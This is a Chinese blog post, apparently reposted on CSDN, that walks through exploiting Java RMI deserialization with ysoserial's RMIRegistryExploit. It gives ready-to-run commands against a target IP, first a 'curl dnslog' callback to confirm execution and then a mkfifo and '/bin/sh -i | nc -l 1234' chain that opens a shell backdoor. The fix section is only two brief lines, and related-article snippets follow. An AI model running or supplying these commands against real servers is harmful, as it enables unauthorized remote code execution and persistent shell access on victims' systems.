Java RMI 反序列化漏洞-远程命令执行

最新推荐文章于 2024-05-14 09:07:14 发布
最新推荐文章于 2024-05-14 09:07:14 发布
阅读量2.8k 收藏 2
点赞数
文章标签: java linux netty python 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tangshuangsss/article/details/122098534
版权

75abd55248b091f3440dff362606f35c.gif

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维7088230813432614f3f905a60d9be667.png

让我们每天进步一点点

简介

RMI即远程方法调用,通俗的来说就是客户端可以调用服务端的方法。和RPC差不多,RMI是java独立实现的一种机制。

RMI使用的通信协议为JRMP(Java Remote Message Protocol ,Java 远程消息交换协议),该协议为Java定制,要求服务端与客户端都为Java编写。

在RMI的通信过程中,用到了很多的序列化和反序列化,而在Java中,只要进行反序列化操作就可能有漏洞。RMI通过序列化传输Remote对象,那么我们可以构造恶意的Remote对象,当服务端反序列化传输过来的数据时,就会触发反序列化,从而执行payload

实战

1.有可以直接使用的反序列化工具ysoserial里面集合了各种java接口反序列化exp,下载地址:

https://github.com/angelwhu/ysoserial

2.nmap或fofa发现端口和服务

af8334e624ef164efeda7fb4f9580044.png

3.出网测试方法:开启一个dnslog来确认命令执行。

6839ace3b5b4a39eda5acf98dc4ebc00.png

4.使用反序列化exp进行命令执行

命令格式:java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 目标ip 目标端口 CommonsCollections1 "curl dnslog"

运行过程中会出错,不用管还是可以执行命令的

4cda8719423723940ddf4840a19ec6b4.png

5.查看dnslog 发现命令已经执行成功

5c1dd82853fdae47bc0feb0df6dd8457.png

6.也可以直接开启nc后门

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 目标ip 目标端口 CommonsCollections1 "rm -f /tmp/f; mkfifo /tmp/f"
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 目标ip 目标端口 CommonsCollections1 "cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f"

7.使用nc进行连接

命令格式:nc 目标ip 目标端口

修复方法:

1.升级最新版本

2.过滤一些危险的类

往期内容

ZooKeeper 未授权访问漏洞利用

java JDWP调试接口任意命令执行漏洞

工具篇-BurpSutie Pro 2021.10.1最新版本

8582b39bb537c5b15798d1bbe8c8a961.gif

0ac1f17b24f79335fd2e8c7984dbeaad.gif

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗4247980505034084699e183a13bd2410.png      

TaibaiXX1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
javaRMI序列漏洞验证工具
08-21
检测javaRMI序列漏洞
JAVA序列漏洞知识点整理
01-20
jenkins序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA序列漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA序列漏洞相关的知识点。   JAVA序列漏洞   序列漏洞的本质是序列机制打破了数据和对象的边界,导致攻击者注入的恶意序列数据在序列过程中被还原成对象,控制了对象可能在目标系统上面执行攻击代码,而不可信的输入和未检测序列对象的安全性是导致序列漏洞的常见原因。Java序列常应用于RMI(Java Remote Method Invocatio, 远程方法调用), JMX(Java Management Exten
远程控制漏洞/【漏洞分析】远程命令执行漏洞总结_小白黑客笔记
程序员三九的博客
05-14 332
简单介绍1. 简介.jar包原始下载地址:.com//fas…用于将Java Bean序列为JSON字符串,也可以从JSON字符串序列到。
Java RMI 远程代码执行漏洞
LuckySec
11-30 3279
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
Java-RMI漏洞利用
2301_76175665的博客
06-16 1535
Java远程方法调用,也就是Java RMI,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法。这与RPC基本相同,但是在面向对象的范例中,而非面向过程,它允许不在同一个地址空间中的Java程序互相通信。192.168.73.130是我们的靶机(metasploitable2),靶机上安装了Java RMI服务(rmiregistry),运行在1099端口上,你也可以通过nmap扫描结果来看这个端口是开放的。在我们的攻击机上使用MSF,搜索java_rmi
JAVA RMI 序列远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 2万+
JAVA RMI 序列远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections序列RCE漏洞CVE-2015-4852JAVA RMI 序列远程命令执行漏洞漏洞资料Java RMI远程序列任意类及远程代码执行解析(CVE-2017-324
Java RMI SERVER命令执行漏洞
m0_62670778的博客
05-12 392
RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列
Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞
千寻的博客
04-03 1330
文章目录环境原理漏洞利用摘抄 环境 原理 漏洞利用 摘抄
Jmeter RMI 序列命令执行漏洞
m0_63241485的博客
08-26 844
ysoserial是一款在Github开源的知名java 序列利用工具,里面集合了各种java序列payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
java序列漏洞-验证.rar
06-25
压缩包内的“attackRMI.jar”可能是用来模拟远程方法调用(RMI)场景的,因为RMIJava序列漏洞的常见利用场景之一。RMI允许远程对象像本地对象一样被调用,但如果没有正确处理序列的对象,就可能成为攻击的...
信息安全技术:Java序列漏洞.pptx
11-01
这可能包括使用开源的漏洞检测工具,如 ysoserial、RMI 或者其他专用于检测Java序列漏洞的工具。通过这些工具,可以模拟攻击行为,检查系统是否仍然容易受到此类攻击。 总之,Java序列漏洞是一种严重的安全...
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1241
vulhub-log4j漏洞复现
oracle java rmi 漏洞,learnjavabug: Java安全相关的漏洞和技术demo,其中包括原生Java、Fastjson、Jackson、Hessian2以及XML序列漏洞利...
weixin_42515056的博客
04-05 150
fastjsoncom.threedr3am.bug.fastjson.FastjsonSerialize(TemplatesImpl) 利用条件:fastjson <= 1.2.24 + Feature.SupportNonPublicFieldcom.threedr3am.bug.fastjson.NoNeedAutoTypePoc 利用条件:fastjson < 1.2.48 不...
rmi 序列漏洞_写一个rmi序列工具
weixin_39997037的博客
01-07 2163
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列对象进行传输,所以JDK8 U121之前的版本存在序列漏洞RMIjava序列原理就不详细介绍了。RMI序列利用成功的条件如下:1.能够进行rmi通信。2.JDK版本小于8.0.1213.引入存在序列链的库,以commons.collections为例的话,就需要其版本小于commons.collec...
rmi 序列漏洞_java序列漏洞—被低估的破坏之王
weixin_39788256的博客
12-31 159
【IT168资讯】IT168资讯】近日,2015年最为被低估的,具有巨大破坏力的漏洞浮出水面。在FoxGlove Security安全团队的@breenmachine 发布一篇博客中介绍了该漏洞在最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS中的应用,实现远程代码执行。更为严重的是,在漏洞被发现的9个月后依然没有有效的java库补丁来针对受到影响的产品...
RMI Bypass Jep290(Jdk8u231) 序列漏洞分析
爱国小白帽
07-26 1494
360-CERT [三六零CERT](javascript:void(0)???? 前天 0x00 漏洞简述 随着RMI的进一步发展,RMI上的序列攻击手段正逐渐增多,该类漏洞最近正受到愈加广泛的关注。 RMI (Java Remote Method Invocation) 是Java远程方法调用,是一种允许一个 JVM 上的 object 调用另一个 JVM 上 object 方法的机制,在Java RMI 的通信过程中存在序列漏洞,攻击者能够利用该漏洞造成代码执行漏洞等级:高危。 在JDK8
如何挖掘序列漏洞
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
05-26 1383
文章目录代码审计payload 1payload 2 平时挖的或者看到的序列例子都很曲折,或者很个例,无法作为一个科普文。偶然看到大佬KeePassX的Java序列漏洞从入门到关门,发现这是一个难得一见的序列挖掘的好例子,它很舒畅,一镜到底。 下面是以我的思路对代码进行白盒审计: 代码审计 看一下/index/*路由功能,发现cookie中的info字段存在发序列漏洞 @GetMapping({"/"}) public String main() { return "re
rmi 序列漏洞_RMI序列漏洞分析
weixin_33800074的博客
01-05 614
原创:Xman21合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ一、RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远...
RMI序列漏洞 修复
最新发布
06-08
RMI序列漏洞是一种常见的Java Web应用程序漏洞,攻击者可以利用该漏洞在目标服务器上执行任意代码。该漏洞利用的核心是Java序列机制,攻击者可以通过构造特定的序列对象来触发漏洞。 要修复RMI序列...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值